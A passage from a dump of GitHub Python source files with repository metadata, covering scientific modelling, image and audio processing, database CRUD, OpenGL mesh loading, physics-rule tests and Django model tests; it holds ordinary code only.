(com-command[-1])/(tim_con-count_c))\n count_c += 0\n else:\n command.append(com)\n count_c = 1\n else:\n command.append(com)\n else:\n command.append(com)\n\n x_train = np.stack((command, Temp), axis=1)\n\n x_train = np.array(x_train)\n\n scaled_instances = scaler.transform(x_train)\n temp = MLPModel.predict(scaled_instances)\n\n entr = 0\n\n for t in range(10,70,1):\n dif = temp[t] - temp[t-1]\n v.append(dif)\n Twout = 273+ 50 - 0.5*1000*(temp[t]-w)/0.25/4180\n entr += abs(0.5*1000*np.log((273 + w)/(273 + temp[t])) +\n 0.25*4180*np.log((273 + 50)/(Twout)))\n\n entr = entr/60\n\n av = 0\n for t in range(60,70,1):\n av += temp[t]\n\n av = av/10\n\n values = [val for k,val in enumerate(v)]\n\n\n x_test = [values]\n\n # Find the correct class \n cl = clf.predict(x_test)\n\n x_test = [[av, cl[0]]]\n\n # Cost of the downstream subsystem\n c1 = np.interp(av,av_clf[cl[0]-1],cost_clf[cl[0]-1])\n\n # KL-divergence\n kl.append(a_3*probs[l]*np.log(probs[l]/prob_dic[float(cl)]))\n\n # Cost in the subsystem itself\n cost.append(a_1*c1 + a_2*entr + \n a_3*probs[l]*np.log(probs[l]/prob_dic[float(cl)]))\n \n # Find the minimal cost\n min_cost.append(min(cost))\n pos = np.argmin(cost)\n\n print(kl[pos])\n print(min(cost))\n print(min(cost)-kl[pos])\n\n return min_cost\n\ndef main():\n agent_2([30],[1])\n\nif __name__==\"__main__\": main()\n","repo_name":"RWTH-EBC/pyDMPC","sub_path":"pyDMPC/SpecialStudies/entropy-agents.py","file_name":"entropy-agents.py","file_ext":"py","file_size_in_byte":3408,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"61"} +{"seq_id":"7077663221","text":"import numpy as np\nimport os\nimport cv2\nimport random\nfrom keras.utils import to_categorical\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\n\nCATEGORIES = [\"star\", \"galaxy\"]\nIMGSIZE = 128\n\n\ndef createTrainingData():\n # Directory of the training dataset\n DATADIR = \"C:/Users/HENAFF/Documents/StarGalaxy Classification/data/train/\"\n training_data = []\n train_X, train_Y = [], []\n\n # Going through different category of data\n for cat in CATEGORIES:\n # Selecting folder betwenen categories\n path = os.path.join(DATADIR, cat)\n # getting index of each category\n classnum = CATEGORIES.index(cat)\n # going through each image\n for img in os.listdir(path):\n try:\n # Reading and giving a gray scale\n img_array = cv2.imread(os.path.join(path, img), cv2.IMREAD_GRAYSCALE)\n # resize to the size given\n new_array = cv2.resize(img_array, (IMGSIZE, IMGSIZE))\n training_data.append([new_array, classnum])\n except Exception as e:\n print(\"Image {} from {} is not working properly\".format(img, cat))\n\n # Shuffle data so the first half is not the first category\n random.shuffle(training_data)\n\n # split the image into train_X and the classification into train_Y\n for x, y in training_data:\n train_X.append(x)\n train_Y.append(y)\n\n # change to numpy array\n train_X = np.array(train_X)\n train_Y = np.array(train_Y)\n\n # Useless but classy\n training_data.clear()\n\n return train_X, train_Y\n\n\ndef createTestingData():\n # Directory of the testing dataset\n DATADIR = \"C:/Users/HENAFF/Documents/StarGalaxy Classification/data/train/\"\n testing_data = []\n test_X, test_Y = [], []\n\n # Going through different category of data\n for cat in CATEGORIES:\n # Selecting folder betwenen categories\n path = os.path.join(DATADIR, cat)\n # getting index of each category\n classnum = CATEGORIES.index(cat)\n # going through each image\n for img in os.listdir(path):\n try:\n # Reading and giving a gray scale\n img_array = cv2.imread(os.path.join(path, img), cv2.IMREAD_GRAYSCALE)\n # resize to the size given\n new_array = cv2.resize(img_array, (IMGSIZE, IMGSIZE))\n testing_data.append([new_array, classnum])\n except Exception as e:\n print(\"Image {} from {} is not working properly\".format(img, cat))\n\n # Shuffle data so the first half is not the first category\n random.shuffle(testing_data)\n\n # split the image into test_X and the classification into test_Y\n for x, y in testing_data:\n test_X.append(x)\n test_Y.append(y)\n\n # change to numpy array\n test_X = np.array(test_X)\n test_Y = np.array(test_Y)\n\n # Useless but classy\n testing_data.clear()\n\n return test_X, test_Y\n\n\n###################################\n# DATA PREPROCESSING\n###################################\ndef dataPreProcessing():\n # Load Data\n train_X, train_Y = createTrainingData()\n test_X, test_Y = createTestingData()\n\n # Reshape the array into a 3 dimension matrix\n train_X = train_X.reshape(-1, IMGSIZE, IMGSIZE, 1)\n test_X = test_X.reshape(-1, IMGSIZE, IMGSIZE, 1)\n print(train_X.shape, test_X.shape)\n # Convert type of data from int8 to float32 because keras works best with float32\n train_X = train_X.astype('float32')\n test_X = test_X.astype('float32')\n\n # Change the image to make pixels onto the 0 and 1 interval\n train_X = train_X / 255\n test_X = test_X / 255\n\n # Convert category to one-hot encoding vector\n train_Y_one_hot = to_categorical(train_Y)\n test_Y_one_hot = to_categorical(test_Y)\n\n # Split the training data into 80% of training and 20% of validation\n train_X, valid_X, train_label, valid_label = train_test_split(train_X, train_Y_one_hot, test_size=0.2,\n random_state=1, shuffle=True)\n\n return train_X, valid_X, train_label, valid_label, test_X, train_Y_one_hot, test_Y_one_hot\n","repo_name":"Theo-HENAFF/star_galaxy_classification","sub_path":"data_prep.py","file_name":"data_prep.py","file_ext":"py","file_size_in_byte":4202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44446153362","text":"\"\"\"\nFilter ``cldf/entries.csv`` according to year or first appearance and\netymological origin. Run ``cldfbench gerstnerhungarian.filter --help``\nfor help.\n\"\"\"\nimport csv\nimport re\n\nfrom clldutils.misc import slug\nfrom loanpy.utils import find_optimal_year_cutoff, IPA\n\nORIGINS = (\"Proto-Uralic\", \"Proto-Finno-Ugric\", \"Proto-Ugric\",\n \"Turkic\", \"unknown\", \"uncertain\")\n\ndef find_empty(senses_file):\n \"\"\"\n Loop through ``cldf/senses.csv`` and add ``Entry_ID`` to list if ``Spacy``\n empty.\n \"\"\"\n empty_keys = set()\n with open(senses_file, 'r') as f:\n senses = list(csv.reader(f))\n h = {i: senses[0].index(i) for i in senses[0]}\n for row in senses:\n if not row[h[\"Spacy\"]]:\n empty_keys.add(row[h[\"Entry_ID\"]])\n\n return empty_keys\n\ndef add_all_etymologies(entries, h):\n \"\"\"\n Loop through column ``Etymology`` in ``entries.csv`` and return a set\n of all possible etymologies.\n \"\"\"\n etym = set()\n for row in entries:\n if row[h[\"Etymology\"]]:\n etym.add(row[h[\"Etymology\"]])\n return etym\n\ndef register(parser):\n \"\"\"\n Register arguments for the run-function. Three optional flags: -y -o -a.\n An integer after -y indicates the year above which words are filtered out.\n The string after -o indicates the etymological origins the words in the\n output should belong to. If -a is toggled on, words with missing data\n will be included in the output.\n \"\"\"\n parser.add_argument(\"-y\", \"--cutoff-year\", dest=\"cutoff_year\", nargs=\"?\",\n default=None, help=\"Higher years will be filtered out\")\n parser.add_argument(\"-o\", \"--etymology\", dest=\"etymology\", nargs=\"?\",\n default=None, help=\"Etymological origins to keep\")\n parser.add_argument(\"-a\", \"--add-empty\", dest=\"add_empty\",\n action=\"store_true\", help=\"Adds word with missing information about \\\nyear of first appearance or etymological origin if toggled on\")\n\n\ndef run(args):\n \"\"\"\n #. Read ``cldf/entries.csv``\n #. Filter according to year of first appearance, etymological origin,\n and missing data.\n #. write results to ``loanpy/hun{year}{etymology}.tsv``\n \"\"\"\n\n # Read entries content\n with open(\"cldf/entries.csv\", \"r\") as f:\n entries = list(csv.reader(f))\n h = {i: entries[0].index(i) for i in entries[0]}\n\n filename = args.etymology\n if not args.cutoff_year:\n args.cutoff_year = find_optimal_year_cutoff(entries, ORIGINS)\n if not args.etymology:\n args.etymology = add_all_etymologies(entries, h)\n filename = \"all\"\n\n # create entries\n entries_filtered = [[\"ID\", \"EntryID\", \"Year\", \"Etymology\"]]\n empty_keys = find_empty(\"cldf/senses.csv\")\n i = 0\n for row in entries[1:]:\n if row[h[\"ID\"]] not in empty_keys:\n if row[h[\"Year\"]] and row[h[\"Etymology\"]]:\n if int(row[h[\"Year\"]]) < int(args.cutoff_year):\n if row[h[\"Etymology\"]] in args.etymology:\n entries_filtered.append(\n [str(i) + \"-\" + row[h[\"ID\"]], row[h[\"ID\"]],\n row[h[\"Year\"]], row[h[\"Etymology\"]]]\n )\n elif args.add_empty:\n entries_filtered.append(\n [str(i) + \"-\" + row[h[\"ID\"]], row[h[\"ID\"]],\n row[h[\"Year\"]], row[h[\"Etymology\"]]]\n )\n\n i += 1\n\n\n with open(f\"loanpy/hun{args.cutoff_year}{filename}.tsv\", \"w+\",\n newline=\"\") as f:\n writer = csv.writer(f, delimiter=\"\\t\")\n writer.writerows(entries_filtered)\n","repo_name":"LoanpyDataHub/gerstnerhungarian","sub_path":"gerstnerhungariancommands/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":3634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72659526913","text":"import datetime\n\nfrom loguru import logger\nfrom sqlalchemy import insert, select, update, delete\nfrom sqlalchemy.ext.asyncio import AsyncSession\n\nfrom .. import schemas\nfrom ..models.day_ratings import DayRating\nfrom ..utils import sa_objects_dicts_list\n\n\nasync def create_day_rating(day_rating: schemas.DayRatingCreate, db: AsyncSession):\n\t\"\"\"\n\tСоздание оценки дня.\n\t\"\"\"\n\tday_rating_dict = day_rating.dict()\n\tday_rating_dict.setdefault(\"date\", datetime.date.today())\n\tquery = insert(DayRating).values(\n\t\t**day_rating_dict\n\t)\n\tawait db.execute(query)\n\tawait db.commit()\n\n\tlogger.info(f\"Day rating for date {datetime.date.today()} was \"\n\t\t\t\tf\"successfully created by user with ID: {day_rating.user_id}\")\n\n\treturn day_rating_dict\n\n\nasync def get_day_ratings(db: AsyncSession):\n\t\"\"\"\n\tПолучение всех оценок дня.\n\t\"\"\"\n\tquery = select(DayRating).order_by(DayRating.date)\n\tresult = await db.execute(query)\n\treturn sa_objects_dicts_list(result.scalars().all())\n\n\nasync def get_day_ratings_me(current_user: schemas.User, filtering_params: dict[str, bool], db: AsyncSession):\n\t\"\"\"\n\tПолучение всех собственных оценок дня пользователем.\n\n\tЕсли параметр в фильтре равен True, то делается фильтрация только по тем оценкам, где этот\n\tоценочный параметр ЗАПОЛНЕН (а не равен True)\n\t\"\"\"\n\tquery = select(DayRating).where(DayRating.user_id == current_user.id).order_by(DayRating.date)\n\tresult = await db.execute(query)\n\tuser_day_ratings = sa_objects_dicts_list(result.scalars().all())\n\tif not any(filtering_params.values()):\n\t\treturn user_day_ratings\n\tfilters = [key for key, val in filtering_params.items() if val is True]\n\n\treturn [\n\t\trating for rating in user_day_ratings if\n\t\tall((rating[param] is not None for param in filters))\n\t]\n\n\nasync def update_day_rating(current_day_rating: schemas.DayRating,\n\t\t\t\t\t\t\tupdated_day_rating: schemas.DayRatingUpdate,\n\t\t\t\t\t\t\tdb: AsyncSession):\n\t\"\"\"\n\tОбновление оценки дня.\n\tИзменить можно только оценочные bool-параметры.\n\t\"\"\"\n\tupdated_day_rating.user_id = current_day_rating.user_id\n\n\tcurrent_day_rating_dict = current_day_rating.dict()\n\tfor key, val in updated_day_rating.dict().items():\n\t\tif val is not None:\n\t\t\tcurrent_day_rating_dict[key] = val\n\n\tquery = update(DayRating).where(\n\t\t(DayRating.user_id == current_day_rating.user_id) &\n\t\t(DayRating.date == current_day_rating.date)\n\t).values(\n\t\t**current_day_rating_dict\n\t)\n\n\tawait db.execute(query)\n\tawait db.commit()\n\n\tlogger.info(f\"Day rating for date {current_day_rating.date} was successfully \"\n\t\t\t\tf\"updated by creator with ID: {current_day_rating.user_id}\")\n\n\treturn {**current_day_rating_dict, \"date\": current_day_rating.date}\n\n\nasync def delete_day_rating(day_rating: schemas.DayRating, db: AsyncSession):\n\t\"\"\"\n\tУдаление оценки дня.\n\t\"\"\"\n\tquery = delete(DayRating).where(\n\t\t(DayRating.user_id == day_rating.user_id) &\n\t\t(DayRating.date == day_rating.date)\n\t)\n\tawait db.execute(query)\n\tawait db.commit()\n\n\tlogger.info(f\"Day rating for date {datetime.date.today()} was \"\n\t\t\t\tf\"successfully deleted by user with ID: {day_rating.user_id}\")\n\n\treturn day_rating\n","repo_name":"Dahaka1/eztask","sub_path":"app/crud/crud_day_ratings.py","file_name":"crud_day_ratings.py","file_ext":"py","file_size_in_byte":3300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74003428","text":"class Solution:\n def findLucky(self, arr: List[int]) -> int:\n mp = collections.defaultdict()\n \n for num in arr:\n if num not in mp:\n mp[num] = 0\n mp[num] += 1\n \n res = -1\n for key, val in mp.items():\n if key==val and key>res:\n res = key\n \n return res","repo_name":"Anirudh-Muthukumar/Leetcode-Solutions","sub_path":"1394. Find Lucky Integer in an Array/1394. Find Lucky Integer in an Array.py","file_name":"1394. Find Lucky Integer in an Array.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5615129179","text":"from glfuncs import *\nfrom glconstants import *\nfrom Program import *\nfrom Texture import *\nimport pysdl2.sdl2 as sdl2\nimport sys\nfrom ctypes import *\n\nclass Mesh:\n def __init__(self,fname,texture):\n fp=open(fname,'rb')\n if 1:\n line=fp.readline().decode().strip()\n assert line==\"mesh_01\"\n while 1:\n \n line=fp.readline().decode().strip()\n \n if line==\"end\":\n break\n elif line.startswith(\"num_vertices\"):\n lst=line.split()\n self.numv=int(lst[1])\n elif line.startswith(\"num_triangles\"):\n lst=line.split()\n self.numt=int(lst[1])\n elif line.startswith(\"texture_file\"):\n lst=line.split()\n \n elif line.startswith(\"vertices\"):\n numbytes=self.numv*3*4\n vdata=fp.read(numbytes)\n elif line.startswith(\"texcoords\"):\n numbytes=self.numv*2*4\n tdata=fp.read(numbytes)\n elif line.startswith(\"normals\"):\n numbytes=self.numv*3*4\n ndata=fp.read(numbytes)\n elif line.startswith(\"indices\"):\n numbytes=self.numt*3*2\n idata=fp.read(numbytes)\n \n else:\n pass\n \n tmp=array.array(\"I\",[0])\n glGenVertexArrays(1,tmp)\n self.vao = tmp[0]\n glBindVertexArray(self.vao)\n self.tex=texture\n glGenBuffers(1,tmp)\n self.vbuff = tmp[0]\n glBindBuffer(GL_ARRAY_BUFFER,self.vbuff)\n glBufferData(GL_ARRAY_BUFFER,len(vdata),vdata,GL_STATIC_DRAW)\n glEnableVertexAttribArray(Program.POSITION_INDEX)\n glVertexAttribPointer(Program.POSITION_INDEX,3,GL_FLOAT,False,3*4,0)\n\n assert len(ndata) == len(vdata)\n \n glGenBuffers(1,tmp)\n self.nbuff = tmp[0]\n glBindBuffer(GL_ARRAY_BUFFER,self.nbuff)\n glBufferData(GL_ARRAY_BUFFER,len(ndata),ndata,GL_STATIC_DRAW)\n glEnableVertexAttribArray(Program.NORMAL_INDEX)\n glVertexAttribPointer(Program.NORMAL_INDEX,3,GL_FLOAT,False,3*4,0)\n\n glGenBuffers(1,tmp)\n self.tbuff = tmp[0]\n glBindBuffer(GL_ARRAY_BUFFER,self.tbuff)\n glBufferData(GL_ARRAY_BUFFER,len(tdata),tdata,GL_STATIC_DRAW)\n glEnableVertexAttribArray(Program.TEXCOORD_INDEX)\n glVertexAttribPointer(Program.TEXCOORD_INDEX,2,GL_FLOAT,False,2*4,0)\n\n glGenBuffers(1,tmp)\n self.ibuff = tmp[0]\n glBindBuffer(GL_ELEMENT_ARRAY_BUFFER,self.ibuff)\n glBufferData(GL_ELEMENT_ARRAY_BUFFER,len(idata),idata,GL_STATIC_DRAW)\n \n glBindVertexArray(0)\n def draw(self,prog):\n prog.setUniform(\"tex\",self.tex)\n glBindVertexArray(self.vao)\n glDrawElements(GL_TRIANGLES, self.numt*3, GL_UNSIGNED_SHORT, 0 )\n\n","repo_name":"brhofmann97/Graphics_Demo","sub_path":"Mesh.py","file_name":"Mesh.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36456463309","text":"# Import basic libraries\nimport keyboard\nimport pyaudio\nimport queue\nimport wave\nimport sys\n\n\n \ndef record_audio(audio_obj,mic_id,STOP):\n # Recording parameters\n chunk = 1024\n format = pyaudio.paInt16\n channels = 1\n rate = 44100\n rec_sec = 10\n stream = audio_obj.open(format=format, \n channels=channels, \n rate=rate, \n input=True,\n input_device_index=mic_id,\n frames_per_buffer=chunk)\n \n print(\"Recording!\")\n while 1:\n # create new WAV file\n filename = \"output.wav\"\n wf = wave.open(filename, \"wb\")\n wf.setnchannels(channels)\n wf.setsampwidth(audio_obj.get_sample_size(format))\n wf.setframerate(rate)\n \n for i in range(0,int(rate / chunk * rec_sec)):\n data = stream.read(chunk)\n #data = np.frombuffer(data, np.int16).flatten().astype(np.float32) / 32768.0\n \n #audio_data = np.frombuffer(data,dtype=np.int16).flatten().astype(np.float32) / 32768.0\n #audio_buffer.put(audio_data)\n try:\n wf.writeframes(data)\n except:\n print(\"Record : Too many requests!\")\n wf.close()\n #audio_data = np.frombuffer(data, np.int16).flatten().astype(np.float32) / 32768.0 \n #audio_data = np.frombuffer(data, dtype=np.int16)\n #audio_data = audio_data / 32768.0 # convert to float\n #audio_data = np.frombuffer(data, dtype=np.int16, count=len(data)//2, offset=0)\n #audio_data = audio_data.astype(np.float32, order='C') / 32768.0\n #audio_buffer.put(audio_data)\n \n \n if keyboard.is_pressed(\"w\") or STOP == True:\n # stop recording\n stream.stop_stream()\n stream.close()\n audio_obj.terminate()\n break\n if STOP == True:\n break\n \n print(\"Closing thread...\")\n sys.exit()\n \nif __name__ == \"__main__\": \n # Get a list of available input devices\n audio_obj= pyaudio.PyAudio()\n info = audio_obj.get_host_api_info_by_index(0)\n numdevices = info.get('deviceCount')\n device_id = []\n for i in range(0, numdevices):\n if (audio_obj.get_device_info_by_host_api_device_index(0, i).get('maxInputChannels')) > 0:\n print(\"Input Device id \", i, \" - \", audio_obj.get_device_info_by_host_api_device_index(0, i).get('name'))\n device_id.append(i)\n \n device = int(input(\"Choose device ID: \"))\n \n # Initialize audio buffer\n audio_buffer = queue.Queue()\n STOP = False\n # Create audio recording thread\n #t1 = threading.Thread(target=record_audio, args=(audio_obj,device_id[2],STOP))\n #t1.start()\n\n chunk = 1024\n format = pyaudio.paInt16\n channels = 1\n rate = 44100\n rec_sec = 10\n stream = audio_obj.open(format=format, \n channels=channels, \n rate=rate, \n input=True,\n input_device_index=device,\n frames_per_buffer=chunk)\n\n print(\"Recording!\")\n #time.sleep(5)\n #exit()\n count = 1\n # create new WAV file\n filename = \"output.wav\"\n wf = wave.open(filename, \"wb\")\n wf.setnchannels(channels)\n wf.setsampwidth(audio_obj.get_sample_size(format))\n wf.setframerate(rate)\n while 1:\n \n \n for i in range(0,int(rate / chunk * rec_sec+1)):\n data = stream.read(chunk)\n #data = np.frombuffer(data, np.int16).flatten().astype(np.float32) / 32768.0\n \n #audio_data = np.frombuffer(data,dtype=np.int16).flatten().astype(np.float32) / 32768.0\n #audio_buffer.put(audio_data)\n \n wf.writeframes(data)\n if keyboard.is_pressed(\"esc\") or STOP == True:\n # stop recording\n stream.stop_stream()\n audio_obj.terminate()\n stream.close()\n break\n break\n \n \n \n wf.close()\n sys.exit(\"Closing program...\")\n print(f\"Writing to file: {count}\")\n count += 1\n \n #audio_data = np.frombuffer(data, np.int16).flatten().astype(np.float32) / 32768.0 \n #audio_data = np.frombuffer(data, dtype=np.int16)\n #audio_data = audio_data / 32768.0 # convert to float\n #audio_data = np.frombuffer(data, dtype=np.int16, count=len(data)//2, offset=0)\n #audio_data = audio_data.astype(np.float32, order='C') / 32768.0\n #audio_buffer.put(audio_data)\n \n \n \n\n ## Calculate memory usage\n #pid = psutil.Process()\n #memory_info = pid.memory_info()\n #print(\"Memory usage:\", memory_info.rss / 1024 / 1024, \"MB\")\n\n\n","repo_name":"ChineseWarlord/Real-Time-Speech-To-Text","sub_path":"src/Audio_Recorder.py","file_name":"Audio_Recorder.py","file_ext":"py","file_size_in_byte":4875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72334035394","text":"import tensorflow as tf\nphysical_devices = tf.config.experimental.list_physical_devices('GPU')\nprint(\"physical_devices-------------\", len(physical_devices))\ntf.config.experimental.set_memory_growth(physical_devices[0], True)\nimport numpy as np\nimport cv2\nimport data.imgs,files,data.feats,data.actions\nimport sim,sim.imgs\n\ndef diff_action(in_path,out_path):\n\tdef helper(frames):\n\t\tsize=len(frames)-1\n\t\tdiff=[ np.abs(frames[i]-frames[i+1]) \n\t\t\t\tfor i in range(size)]\n\t\treturn np.mean(diff,axis=0)\n\tget_actions(in_path,helper,out_path)\n\ndef mean_action(in_path,out_path,dims=(64,64)):\n\tdef helper(frames):\n\t\treturn np.mean(frames,axis=0)\n\tdata.actions.get_actions(in_path,helper,out_path,dims=dims)\n\ndef action_one_shot(in_path,out_path=None,n_epochs=5):\n dtw_feats=data.actions.read_actions(in_path)\n dtw_feats.transform(lambda img_i: np.expand_dims(img_i,axis=-1))\n make_model=sim.imgs.make_conv\n sim_train=sim.SimTrain(make_model,sim.all_cat)\n params={'input_shape':(64,64,1)}\n sim_train(dtw_feats,out_path,n_epochs,params)\n\nfrom keras.models import load_model\n\ndef extract(in_path,nn_path,out_path):\n action_feats=data.actions.read_actions(in_path)\n def helper(img_i):\n \timg_i=np.expand_dims(img_i,axis=-1)\n \treturn np.expand_dims(img_i,axis=0)\n action_feats.transform(helper)\n extractor=load_model(nn_path)\n new_feats=data.feats.Feats()\n for name_i,img_i in action_feats.items():\n \tnew_feats[name_i]=extractor.predict(img_i)\n new_feats.save(out_path)\n\ndef binary_one_shot(in_path,out_path,n_epochs=5):\n\tn_cats=12\n\tdataset=read_actions(in_path)\n\tdataset.add_dim()\n\tget_cat=binary.BinaryCat()\n\tsim_nn=sim.SimTrain(sim.imgs.make_conv,get_cat)\n\tdef binary_gen(nn_path,i):\n\t\tget_cat.cat=i\n\t\tsim_nn(dataset,nn_path,n_epochs)\n\tfuncs=[[extract,[\"in_path\",\"nn\",\"feats\"]]]\n\tdir_names=[\"feats\"]\n\targ_dict={'in_path':in_path}\t\t\n\tbinary_ens=ens.BinaryEns(binary_gen,funcs,dir_names)\n\tbinary_ens(out_path,n_cats,arg_dict)\n\ndef action_img_exp(in_path,n_epochs=100):\n\tpaths=files.get_paths(in_path,['frames','mean',\"ens\"])\n\tmean_action(paths[\"frames\"],paths[\"mean\"])\n\taction_one_shot(paths[\"mean\"],paths[\"action\"],n_epochs)\n#\tbinary_one_shot(paths[\"mean\"],paths[\"ens\"],n_epochs)\n\nif __name__ == \"__main__\":\n#\taction_img_exp(\"../3DHOI/agum\",100)\n\tmean_action(\"../clean/scaled\",\"../clean/mean\",dims=None)\n#\taction_one_shot(\"../3DHOI/actions/mean\",out_path=\"../3DHOI/actions/nn\",n_epochs=200)\n#\textract(\"../3DHOI/actions/mean\",\"../3DHOI/actions/nn\",\"../3DHOI/actions/feats\")","repo_name":"tjacek/ActionClassifier","sub_path":"action_imgs.py","file_name":"action_imgs.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"11867364233","text":"import pytest\n\nfrom qrules.particle import ParticleCollection\nfrom qrules.quantum_numbers import EdgeQuantumNumbers as EdgeQN\nfrom qrules.settings import (\n InteractionType,\n _create_domains,\n _halves_domain,\n _int_domain,\n create_interaction_settings,\n)\n\n\nclass TestInteractionType:\n @pytest.mark.parametrize(\n (\"description\", \"expected\"),\n [\n (\"EM\", InteractionType.EM),\n (\"e\", InteractionType.EM),\n (\"electromagnetic\", InteractionType.EM),\n (\"w\", InteractionType.WEAK),\n (\"weak\", InteractionType.WEAK),\n (\"strong\", InteractionType.STRONG),\n (\"S\", InteractionType.STRONG),\n (\"\", ValueError),\n (\"non-existing\", ValueError),\n ],\n )\n def test_from_str(self, description: str, expected: InteractionType):\n if expected is ValueError:\n with pytest.raises(ValueError, match=r\"interaction type\"):\n assert InteractionType.from_str(description)\n else:\n assert InteractionType.from_str(description) == expected\n\n\ndef test_create_domains(particle_database: ParticleCollection):\n pdg = particle_database\n pions = pdg.filter(lambda p: p.name.startswith(\"pi\"))\n domains = _create_domains(pions)\n assert len(domains) == 15\n assert domains[EdgeQN.baryon_number] == [0]\n assert domains[EdgeQN.strangeness] == [0]\n assert domains[EdgeQN.charmness] == [0]\n assert domains[EdgeQN.bottomness] == [0]\n assert domains[EdgeQN.charge] == [-1, 0, +1]\n assert domains[EdgeQN.spin_magnitude] == [0, 0.5, 1, 1.5, 2]\n assert (\n domains[EdgeQN.spin_projection]\n == [-2, -1.5, -1, -0.5] + domains[EdgeQN.spin_magnitude]\n )\n assert domains[EdgeQN.isospin_magnitude] == [0, 0.5, 1]\n assert domains[EdgeQN.isospin_projection] == [-1, -0.5, 0, 0.5, 1]\n\n\n@pytest.mark.parametrize(\"interaction_type\", list(InteractionType))\n@pytest.mark.parametrize(\"nbody_topology\", [False, True])\n@pytest.mark.parametrize(\"formalism\", [\"canonical\", \"canonical-helicity\", \"helicity\"])\ndef test_create_interaction_settings(\n particle_database: ParticleCollection,\n interaction_type: InteractionType,\n nbody_topology: bool,\n formalism: str,\n):\n settings = create_interaction_settings(\n formalism,\n particle_db=particle_database,\n nbody_topology=nbody_topology,\n )\n assert set(settings) == set(InteractionType)\n\n edge_settings, node_settings = settings[interaction_type]\n edge_qn_domains_str = { # strings are easier to compare with pytest\n qn_type.__name__: domain for qn_type, domain in edge_settings.qn_domains.items()\n }\n assert edge_qn_domains_str == {\n \"baryon_number\": [-1, 0, +1],\n \"electron_lepton_number\": [-1, 0, +1],\n \"muon_lepton_number\": [-1, 0, +1],\n \"tau_lepton_number\": [-1, 0, +1],\n \"parity\": [-1, +1],\n \"c_parity\": [-1, +1, None],\n \"g_parity\": [-1, +1, None],\n \"spin_magnitude\": _halves_domain(0, 4),\n \"spin_projection\": _halves_domain(-4, +4),\n \"charge\": _int_domain(-2, 2),\n \"isospin_magnitude\": _halves_domain(0, 1.5),\n \"isospin_projection\": _halves_domain(-1.5, +1.5),\n \"strangeness\": _int_domain(-3, +3),\n \"charmness\": _int_domain(-1, 1),\n \"bottomness\": _int_domain(-1, 1),\n }\n\n expected = {\n \"l_magnitude\": _int_domain(0, 2),\n \"s_magnitude\": _halves_domain(0, 2),\n }\n if \"canonical\" in formalism:\n expected[\"l_projection\"] = [-2, -1, 0, 1, 2]\n expected[\"s_projection\"] = _halves_domain(-2, 2)\n if formalism == \"canonical-helicity\":\n expected[\"l_projection\"] = [0]\n if \"helicity\" in formalism and interaction_type != InteractionType.WEAK:\n expected[\"parity_prefactor\"] = [-1, 1]\n if nbody_topology:\n expected[\"l_magnitude\"] = [0]\n expected[\"s_magnitude\"] = [0]\n if nbody_topology and formalism != \"helicity\":\n expected[\"l_projection\"] = [0]\n expected[\"s_projection\"] = [0]\n\n node_qn_domains_str = { # strings are easier to compare with pytest\n qn_type.__name__: domain for qn_type, domain in node_settings.qn_domains.items()\n }\n assert node_qn_domains_str == expected\n\n\n@pytest.mark.parametrize(\n (\"start\", \"stop\", \"expected\"),\n [\n (-0.3, 0.5, None),\n (-2.0, 0.5, [-2, -1.5, -1, -0.5, 0, 0.5]),\n (-1, +1, [-1, -0.5, 0, 0.5, +1]),\n ],\n)\ndef test_halves_range(start: float, stop: float, expected: list):\n if expected is None:\n with pytest.raises(ValueError, match=r\"needs to be multiple of 0.5\"):\n _halves_domain(start, stop)\n else:\n assert _halves_domain(start, stop) == expected\n","repo_name":"ComPWA/qrules","sub_path":"tests/unit/test_settings.py","file_name":"test_settings.py","file_ext":"py","file_size_in_byte":4737,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"43208344480","text":"from django.contrib.auth import get_user_model\nfrom django.test import TestCase\n\nfrom ..models import Group, Post\n\nUser = get_user_model()\n\n\nclass PostModelTest(TestCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.user = User.objects.create_user(username='auth')\n cls.group = Group.objects.create(\n title='Тестовая группа',\n slug='Тестовый слаг',\n description='Тестовое описание',\n )\n cls.post = Post.objects.create(\n author=cls.user,\n text='Это обычный тестовый пост созданый просто для тестирования.',\n )\n\n def test_model_group_have_correct_object_name(self):\n \"\"\"Проверяем, что у модели 'group' корректно работает __str__.\"\"\"\n self.assertEqual(\n str(self.group),\n self.group.title,\n 'Записи не совпадают'\n )\n\n def test_model_post_less_fifteen_sym(self):\n \"\"\"Проверяем, что у модели 'post' корректно работает __str__.\"\"\"\n self.assertEqual(\n str(self.post),\n # self.post.text[:15],\n self.post.text,\n 'Вывод не сходится с условием.'\n )\n","repo_name":"DanilovKZN/YaHelper","sub_path":"yatube/posts/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35782704331","text":"from subprocess import call\nfrom circuit_explorer.utils import load_config\n\nconfig_file = '../configs/alexnet_sparse_config.py'\n\nconfig = load_config(config_file)\nlayers = config.layers\nunits = config.units\nbatch_size = 1\n\n\nprint(batch_size)\nprint(layers)\nprint(units)\n\ndata_path = '../image_data/imagenet_2/'\ndevice = 'cuda:2'\n\nsparsities = [.9,.8,.7,.6,.5,.4,.3,.2,.1,.05,.01,.005,.001]\n#sparsities = [.2]\n##layers = [layers[0]]\n#units = [units[0]]\n\nout_root = './correlations/'\n\noriginal_act_file = './original_activations/%s/imagenet_2/original_activations.pt'%config.name\n\ndel config\n\nfor unit in units:\n print('PROCESSING 